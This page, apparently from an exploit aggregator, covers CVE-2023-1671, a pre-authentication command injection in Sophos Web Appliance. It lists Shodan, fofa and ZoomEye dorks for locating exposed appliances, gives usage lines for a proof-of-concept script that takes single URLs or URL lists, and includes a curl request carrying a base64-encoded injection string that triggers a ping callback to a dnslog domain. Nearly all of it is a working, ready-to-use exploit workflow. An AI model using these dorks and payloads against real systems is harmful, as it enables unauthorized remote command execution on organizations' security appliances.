Exploit for Command Injection in Sophos Web Appliance CVE-2023-1671

Name: Exploit for Command Injection in Sophos Web Appliance CVE-2023-1671
Rating: 5 (160 reviews)

2023-04-24 | CVSS 7.5

## https://sploitus.com/exploit?id=406D6593-2C24-5F7E-A239-CB0E77023D1D
# Dork

## fofa

`(title="Sophos Web Appliance" || app="Sophos-Web-Appliance") && title!="Sophos Web Appliance：错误请求"`

## ZoomEye

`title:"Sophos Web Appliance"-title:"Sophos Web Appliance: Forbidden"-title:"Sophos Web Appliance: Bad Request"`

## Shodan

`title:"Sophos Web Appliance"`

# Usage

```shell
python CVE-2023-1671-POC.py -u http://www.example.com
python CVE-2023-1671-POC.py -u http://www.example.com -d xxxxxx.dnslog.cn

python CVE-2023-1671-POC.py -f urls.txt
python CVE-2023-1671-POC.py -f urls.txt -d xxxxxx.dnslog.cn
```

or without this script file:

```shell
echo -n "';ping xxxxx.dnslog.cn -c 3 #" | base64
# JztwaW5nIHh4eHh4LmRuc2xvZy5jbiAtYyAzICM=  --> JztwaW5nIHh4eHh4LmRuc2xvZy5jbiAtYyAzICM
curl -k --trace-ascii % "http://www.example.com/index.php?c=blocked&action=continue" -d "args_reason=filetypewarn&url=12345&filetype=12345&user=12345&user_encoded=JztwaW5nIHh4eHh4LmRuc2xvZy5jbiAtYyAzICM"
```

# Reference

[Analysis of Pre-Auth RCE in Sophos Web Appliance (CVE-2023-1671) - Blog - VulnCheck](https://vulncheck.com/blog/cve-2023-1671-analysis)